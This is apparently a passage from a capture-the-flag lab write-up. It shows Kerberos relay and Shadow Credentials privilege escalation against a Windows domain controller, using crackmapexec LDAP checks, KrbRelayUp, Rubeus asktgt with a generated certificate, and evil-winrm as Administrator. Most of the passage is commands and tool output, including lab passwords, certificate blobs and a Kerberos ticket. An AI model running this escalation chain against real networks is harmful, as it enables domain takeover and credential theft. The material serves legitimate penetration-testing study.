904f046a3d5ddadbf6af99a63e80c6aed9ba61be77e788fcdb51baf22460e70eaf7b17487f5b95dc3b02c4ad1affd1dd0f842d8f897c1f6a2b0d9acb6114119905a119745e2461d5fd19c4934e39875f3876278e87b1fcacac31e30896cba51edb4bea0abbe467e3f398b99eee5fe85d1a00d253ac7298897dfd786aded14e479971e925da0353c1dd6e136903d56d82df2fad99298fdfc68caa0052c324cddc995270a9c064c291f14d80ea32f62e19d500cb359fd00966874747c035c8df87cd686864fd58f347880fa697abe6c74be7d8cb401694a473988ca2580bd997f0106e7bb1b127044ee9457fdfd67d9a2c95373d7d204fb9ce6c33d543a5b2cd961ccfc04075f77f8a4998faa292e83bf9a829d30006b2a40cd807bcd25e62a4605a60ce140d6986a88e2acfd87d1a907de1687ffc3d4a42aeeebf83bbf4a0c76c5132b4dd8355e7bfc4545efd92da6601f4652f8609402e29dbfbae32cc2f090b090e605928601f544637d779c96dab4fa0ebc5ae5c74d2f51206e4e28088ca7bb34e630b47198e3393bf5ae3b9ac50e31e71e9d72d65f1fe2ea6dc5921e6b2fced3c5cf6728882c33e5755514de6e33edc4193ee2690547cf6a5a4207e3a8d01a1cc616e9a30c1ee54fb035560457e4097fe4af5c4108aa66c24089d86c040e72c2f7089a8ff39203281e183ebbf03870153cd4d6b7e2bfa734b00cee9f75568824bb4843f0b2450310592690570574e0c4f5692b759949f49350cedc31ee77baf457c530e9041a9fecd3fdfd6d2a68efa659decd0b9d5551cdb250237f1e47e855240d213f5ac00271da102747176452c9a5302955639ffa8b147dde14ece807e5e9b68ce6db496fc9254114ffc53219672c28f735213166f3f47345462afbb7098a1bda8b12811839643f6fba482019e3082019aa003020112a28201910482018d1f18b17b7c36a41839b5ebf8d5d3d2eec0f8dbeab7bc34f5f0ad4aaadeeb876a91babe809b17d143e2917896fad26bbbc006981f9b411ba76d7f2679bd1a3b785305f94e6d4009026fdfdc595d8323f82bfb9f9f22c274e8ac40537c6c74f148493523c8ebb021ec9af5b3ee7c171592d497118984fbabe67a941b96e06a711de2d19caaf960dda18436af7b77311b36bdb54722ca360db88302e6e6e4a929677c07d8084a974ef8b02ad8539b662ea03fd3fba7020647c9a57d765e5f0965950211e1b4f9872a48633fd7fd7b2c85b52935d614567d146f3a9ee8ef16fc22c60043909c4c3c6466015d27e0357dae52b45268e6f23905630202ae3c97fb65ae73cdf8e81ef53c02cf8bfa14bd16f7ccb5f174be1dc10a8e74f1d5bf88379321f316d820d3f564d33cdae93300ba28e3896de759cda90db8a26e2db1f1b38b1d91e207a78fc1b5a84edad7578b4940203e25dacb6d2de28531a841eccd5152b371c7050cec21b123a259dfd0ff4938131504f06269b660f02ad3dc4b27eacb9d8e8eb0aa3eafbe6060d9b44031
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046eaaccbc427c537bd34cfaad3ccfe07faa4cc962d5d69beb23751a7b161e376ba5ef59142de74e813e06d6168ec95cde528b4740c0c81d6e44a7dcb8880cd1cfaf1f3015610a007d87ee3d682637a6d952cbbde71f8696d20c62f3e9bca547a0eb1933e366562379501f7755ad4db3
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404429d0e40f70e6a4260c81b4b46a52e91a7459b6722a628653d073e9bfa243ceb1f619595cbadaeb7191cd7e3b0b32f0c3b0d78cfe0bb84f7a77250816d2dd30e49a692
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Users\svc_scan\Desktop> 

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ evil-winrm -i bruno.vl -u 'Administrator' -p 'Puckie71#'         

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/29/2022   3:00 PM             37 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{b52<REDACTED>a7d}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Getting Root with Shadow Credentials (krbrelayup & rubeus)

i used : https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelayUp.exe & Rubeus.exe

Valid CLSID from : https://vulndev.io/cheats-windows/

also LDAP signing must be disabled , and we must have a Valid machineAccount quota

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          LDAP Signing NOT Enforced!
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          Channel Binding is set to "NEVER" - Time to PWN!
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq         
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
MAQ         brunodc.bruno.vl 389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         brunodc.bruno.vl 389    BRUNODC          MachineAccountQuota: 10

 

PS C:\temp> .\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM


[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] Generating certificate
[+] Certificate generated
[+] Generating KeyCredential
[+] KeyCredential generated with DeviceID 0367120a-5b1f-4343-92e6-87879f2831b7
[+] KeyCredential added successfully
[+] Certificate: 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
[+] Certificate Password: tL4#hQ9=yQ9$
[+] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[+] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\BRUNODC$'
[+] TGT request successful!
[+] Building S4U2self 
[+] Using domain controller: brunodc.bruno.vl (fe80::65c9:b4fb:c500:8a8b%6)
[+] Sending S4U2self request to fe80::65c9:b4fb:c500:8a8b%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'BRUNODC$@BRUNO.VL'
[+] Substituting in alternate service name: HOST/BRUNODC
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process         : 'C:\temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 4192
[+] Ticket successfully imported!
[+] LUID            : 0x3de849
[+] System service should be started in background
PS C:\temp> ./Rubeus.exe asktgt /user:brunodc$ /certificate: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 /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap
./Rubeus.exe asktgt /user:brunodc$ /certificate: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 /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: bruno.vl
[*] Using salt: BRUNO.VLhostbrunodc.bruno.vl
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\brunodc$'
[*] Using domain controller: fe80::65c9:b4fb:c500:8a8b%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGWjCCBlagAwIBBaEDAgEWooIFazCCBWdhggVjMIIFX6ADAgEFoQobCEJSVU5PLlZMoh0wG6ADAgECoRQwEhsGa3JidGd0GwhicnVuby52bKOCBSswggUnoAMCARKhAwIBAqKCBRkEggUVnsHoyL4vAZFQgL+BBGnwGEvgQb0ltWK4cbT4CT+2sIRn02hjadca7rP2xUXYlLdHbXF05HGFwdAWoacK/d5DeSQ1AQE/OyZ01hKjjV4m+Sf6T44By2DRcKMln0MxuVlATrnr9d/dLzVoq0jk0VbOWtsMFPnozj9cdBqvHXqnqzYX0hEc22Uj/PR/dfde4/71m+SxOVw5Ozcii0xrLfvuuQest4y3A4gIIy9wU78/LpJRuW8gmLsVXGbxXhdkG2efVqw1qrbRvnU5ThqtDukqLEuESAe6ANOqL3EjKEx3NpGPEEPfEDRr7c3XejHlSx/AQKRenGfoBlq3OnWnyQKgJNQuzRTe32HqmSeBEkRQrjJQBv9w2Or0P3qeb+YEa5rXIpGG9cVoBQwxnr5QB/a94o8765lSYFCa5vLJ9iOurpXsXaBuDYRETAdoOsY750AzciR72ZKmPHiqELkmjbrIyDuiQugc1JbFCEuvOacZMROX0gurc